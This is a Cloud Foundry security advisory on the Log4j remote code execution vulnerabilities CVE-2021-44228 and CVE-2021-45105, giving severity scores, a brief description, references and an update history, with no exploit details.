10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%
Severity
Critical
Vendor
Cloud Foundry Foundation
Description
A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed . Log4j versions prior to 2.15.0 are subject to a remote code execution vulnerability via the ldap JNDI parser and may allow for remote code execution in impacted cloud foundry products.
This is an ongoing event, please check this advisory for frequent updates as they develop. The advisory has been updated to cover for CVE-2021-45105 too which was later identified in log4j versions below 2.17.0 .
Affected Cloud Foundry Products and Versions
Severity is critical unless otherwise noted.
Mitigation
Users of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases( for both the above CVEs):
References:
https://vulners.com/cve/CVE-2021-44228
<https://github.com/advisories/GHSA-jfh8-c2jp-5v3q>
History
2021-12-13: Initial vulnerability report published.
2021-12-14: Updated with patch details of Cf-for-k8s
2021-12-15: Updated credhub, UAA and Php buildpack versions with latest log4j 2.16 versions
2021-12-18: Updated cf-for-k8s, cf-deployment, Java buildpack versions with latest log4j 2.16 versions
2022-01-06: Updated UAA, Java buildpack, PHP- buildpack, Cf-for-k8s versions for fixes of CVE-2021-45105.
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%